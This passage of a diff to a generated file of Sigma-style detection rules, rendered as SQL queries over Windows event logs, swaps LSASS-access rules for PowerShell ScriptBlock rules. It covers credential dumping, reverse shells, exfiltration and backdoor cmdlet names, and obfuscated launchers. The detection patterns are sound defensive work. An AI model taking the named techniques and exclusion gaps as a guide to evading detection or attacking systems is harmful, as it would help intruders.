OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.CustomAttributeBuilder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.UnmanagedType%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_keywords.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": 
"aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Recon Information for Export with PowerShell", + "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_susp_recon_export.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "title": "Powershell XML Execute Command", + "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line 
interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess 
= '0x1fffff')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" + "filename": "posh_ps_xml_iex.yml" }, { - "title": "Potential NT API Stub Patching", - "id": "b916cba1-b38a-42da-9223-17114d846fd6", - "status": "experimental", - "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "title": "Automated Collection Command PowerShell", + "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 
'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" ], - "filename": "proc_access_win_invoke_patchingapi.yml" + "filename": "posh_ps_automated_collection.yml" }, { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' 
ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Windows Defender Exclusions Added - PowerShell", - "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", - "status": "experimental", - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "author": "Tim Rauch", + "title": "Testing Usage of Uncommonly Used Port", + "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "status": "test", + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" ], - "filename": "posh_ps_win_defender_exclusions_added.yml" + "filename": "posh_ps_test_netconnection.yml" }, { - "title": "Extracting Information with PowerShell", - "id": "bd5971a7-626d-46ab-8176-ed643f694f68", - "status": "test", - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "title": "Powershell Sensitive File Discovery", + "id": "7d416556-6502-45b2-9bad-9d2f05f38997", + "status": "experimental", + "description": "Detect adversaries enumerate sensitive files", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_extracting.yml" + "filename": "posh_ps_sensitive_file_discovery.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", "attack.t1027", 
@@ -6161,39 +5692,38 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "PowerShell Remote Session Creation", - "id": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", + "title": "Detected Windows Software Discovery - PowerShell", + "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", - "author": "frack113", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSSession%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" ], - "filename": "posh_ps_remote_session_creation.yml" + "filename": "posh_ps_software_discovery.yml" }, { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -6202,250 +5732,291 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", - "id": "afd3df04-948d-46f6-ae44-25966c44b97f", - "status": "experimental", - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText 